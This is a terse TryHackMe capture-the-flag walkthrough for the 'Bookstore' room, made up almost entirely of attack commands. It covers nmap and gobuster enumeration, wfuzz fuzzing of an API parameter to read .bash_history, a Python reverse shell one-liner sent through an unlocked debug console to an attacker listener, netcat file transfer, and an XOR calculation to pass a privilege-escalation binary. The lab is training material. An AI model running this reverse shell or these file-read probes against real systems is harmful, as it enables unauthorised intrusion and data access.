Bookstore

Room Link: https://tryhackme.com/room/bookstoreoc

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/5000 - HTTP

Kali

gobuster dir -u http://$VICTIM:5000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

console is locked by a pin, we will have to come back to it.

Kali

wfuzz -c -f bookstore.txt -u "http://10.10.237.140:5000/api/v1/resources/books?FUZZ=.bash_history" -w /usr/share/wordlists/SecLis
ts/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404

Initial Shell

We bow have the pin for console 123-321-135

Kali

nc -lvnp 1337

Console

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.43.15",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Netcat

Kali(receiving)

nc -l -p 1234 > try-harder

Victim(sending)

nc -w 3 $KALI 1234 < try-harder

Ghidra

We find how the magic number is made.

Kali

ghidra

We can just quickly use python to solve the answer

Kali

python
1573724660 ^ 0x5db3 ^ 0x1116

Victim

./try-harder 
Answer: 1573743953